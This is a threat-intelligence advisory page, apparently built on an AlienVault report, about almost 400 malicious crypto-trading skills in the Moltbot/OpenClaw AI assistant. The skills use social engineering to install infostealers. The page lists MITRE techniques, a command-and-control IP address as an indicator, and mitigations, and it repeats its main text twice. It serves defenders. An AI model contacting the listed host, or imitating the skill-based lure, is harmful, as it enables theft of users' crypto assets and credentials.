Hundreds of Malicious Crypto Trading Add-Ons Found in Moltbot/OpenClaw
Almost 400 fake crypto trading add-ons in the Moltbot/OpenClaw AI assistant project have been discovered, potentially leading users to install information-stealing malware. These add-ons, known as skills, masquerade as cryptocurrency trading automation tools and target various platforms. The malicious skills share the same command-and-control infrastructure and use social engineering to convince users to execute commands that steal crypto assets. The supply chain attack relies on social engineering and lacks security review in the skills publication process. Security experts warn about the inherent risks of endpoint-native AI agents and emphasize the need for proper security controls and architectural design considerations.
AI Analysis
Technical Summary
The threat involves a large-scale supply chain attack targeting the Moltbot/OpenClaw AI assistant project, where almost 400 malicious add-ons (skills) masquerade as legitimate cryptocurrency trading automation tools. These skills are designed to deploy information-stealing malware that targets users’ crypto assets. The attack exploits the skills publication process, which lacks adequate security review, enabling attackers to distribute malicious code widely. The malicious skills share a common command-and-control (C2) infrastructure, facilitating coordinated data exfiltration and remote control. Social engineering tactics are heavily employed to convince users to execute commands that compromise their wallets and sensitive information. The attack techniques align with MITRE ATT&CK tactics such as T1071 (Application Layer Protocol), T1195 (Supply Chain Compromise), T1555 (Credentials from Password Stores), T1219 (Remote Access Software), T1552 (Unsecured Credentials), T1204 (User Execution), T1199 (Trusted Relationship), and T1056 (Input Capture). The threat highlights the risks of endpoint-native AI agents, which if not designed with security in mind, can become vectors for malware delivery and data theft. No CVE or known exploits in the wild have been reported yet, but the scale and sophistication suggest a medium severity threat with potential for significant financial and reputational damage.
Potential Impact
European organizations involved in cryptocurrency trading or utilizing AI assistants like Moltbot/OpenClaw face risks including theft of crypto assets, exposure of sensitive credentials, and potential compromise of endpoint systems. Financial losses could be substantial due to direct theft or fraud. The shared C2 infrastructure means that once infected, multiple systems can be controlled remotely, increasing the attack surface and potential for lateral movement. The social engineering aspect increases the likelihood of successful exploitation, especially among users unfamiliar with AI assistant security risks. This threat could undermine trust in AI-driven trading tools and impact regulatory compliance related to data protection and financial security. Additionally, organizations may face operational disruptions if endpoint systems are compromised or if remediation efforts require system downtime. The lack of security review in the add-on publication process indicates a systemic vulnerability that could be exploited repeatedly, affecting the broader European crypto ecosystem.
Mitigation Recommendations
1. Implement strict vetting and security review processes for all AI assistant add-ons or skills before installation, including automated and manual code analysis. 2. Educate users on the risks of social engineering and the importance of verifying the authenticity of crypto trading tools and commands executed via AI assistants. 3. Employ endpoint detection and response (EDR) solutions capable of monitoring unusual command executions and network communications to known malicious C2 IPs such as 91.92.242.30. 4. Restrict AI assistant permissions to the minimum necessary and disable execution of untrusted or unsigned skills. 5. Use multi-factor authentication and hardware wallets for cryptocurrency transactions to reduce the impact of credential theft. 6. Monitor network traffic for signs of data exfiltration or communication with suspicious infrastructure. 7. Collaborate with AI assistant vendors to improve the security architecture, including sandboxing skills and enforcing strict publication policies. 8. Maintain up-to-date threat intelligence feeds and integrate indicators of compromise (IOCs) into security monitoring tools. 9. Conduct regular security awareness training focused on emerging AI-related threats and supply chain risks. 10. Establish incident response plans specifically addressing AI assistant compromise scenarios.
Affected Countries
Germany, United Kingdom, France, Netherlands, Switzerland, Sweden
Indicators of Compromise
- ip: 91.92.242.30
Hundreds of Malicious Crypto Trading Add-Ons Found in Moltbot/OpenClaw
Description
Almost 400 fake crypto trading add-ons in the Moltbot/OpenClaw AI assistant project have been discovered, potentially leading users to install information-stealing malware. These add-ons, known as skills, masquerade as cryptocurrency trading automation tools and target various platforms. The malicious skills share the same command-and-control infrastructure and use social engineering to convince users to execute commands that steal crypto assets. The supply chain attack relies on social engineering and lacks security review in the skills publication process. Security experts warn about the inherent risks of endpoint-native AI agents and emphasize the need for proper security controls and architectural design considerations.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The threat involves a large-scale supply chain attack targeting the Moltbot/OpenClaw AI assistant project, where almost 400 malicious add-ons (skills) masquerade as legitimate cryptocurrency trading automation tools. These skills are designed to deploy information-stealing malware that targets users’ crypto assets. The attack exploits the skills publication process, which lacks adequate security review, enabling attackers to distribute malicious code widely. The malicious skills share a common command-and-control (C2) infrastructure, facilitating coordinated data exfiltration and remote control. Social engineering tactics are heavily employed to convince users to execute commands that compromise their wallets and sensitive information. The attack techniques align with MITRE ATT&CK tactics such as T1071 (Application Layer Protocol), T1195 (Supply Chain Compromise), T1555 (Credentials from Password Stores), T1219 (Remote Access Software), T1552 (Unsecured Credentials), T1204 (User Execution), T1199 (Trusted Relationship), and T1056 (Input Capture). The threat highlights the risks of endpoint-native AI agents, which if not designed with security in mind, can become vectors for malware delivery and data theft. No CVE or known exploits in the wild have been reported yet, but the scale and sophistication suggest a medium severity threat with potential for significant financial and reputational damage.
Potential Impact
European organizations involved in cryptocurrency trading or utilizing AI assistants like Moltbot/OpenClaw face risks including theft of crypto assets, exposure of sensitive credentials, and potential compromise of endpoint systems. Financial losses could be substantial due to direct theft or fraud. The shared C2 infrastructure means that once infected, multiple systems can be controlled remotely, increasing the attack surface and potential for lateral movement. The social engineering aspect increases the likelihood of successful exploitation, especially among users unfamiliar with AI assistant security risks. This threat could undermine trust in AI-driven trading tools and impact regulatory compliance related to data protection and financial security. Additionally, organizations may face operational disruptions if endpoint systems are compromised or if remediation efforts require system downtime. The lack of security review in the add-on publication process indicates a systemic vulnerability that could be exploited repeatedly, affecting the broader European crypto ecosystem.
Mitigation Recommendations
1. Implement strict vetting and security review processes for all AI assistant add-ons or skills before installation, including automated and manual code analysis. 2. Educate users on the risks of social engineering and the importance of verifying the authenticity of crypto trading tools and commands executed via AI assistants. 3. Employ endpoint detection and response (EDR) solutions capable of monitoring unusual command executions and network communications to known malicious C2 IPs such as 91.92.242.30. 4. Restrict AI assistant permissions to the minimum necessary and disable execution of untrusted or unsigned skills. 5. Use multi-factor authentication and hardware wallets for cryptocurrency transactions to reduce the impact of credential theft. 6. Monitor network traffic for signs of data exfiltration or communication with suspicious infrastructure. 7. Collaborate with AI assistant vendors to improve the security architecture, including sandboxing skills and enforcing strict publication policies. 8. Maintain up-to-date threat intelligence feeds and integrate indicators of compromise (IOCs) into security monitoring tools. 9. Conduct regular security awareness training focused on emerging AI-related threats and supply chain risks. 10. Establish incident response plans specifically addressing AI assistant compromise scenarios.
Affected Countries
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.infosecurity-magazine.com/news/malicious-crypto-trading-skills"]
- Adversary
- null
- Pulse Id
- 698329ed1fc44cc3c16e1038
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip91.92.242.30 | — |
Threat ID: 69847bd0f9fa50a62f1a71f2
Added to database: 2/5/2026, 11:15:28 AM
Last enriched: 2/5/2026, 11:29:46 AM
Last updated: 3/23/2026, 7:25:00 AM
Views: 73
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.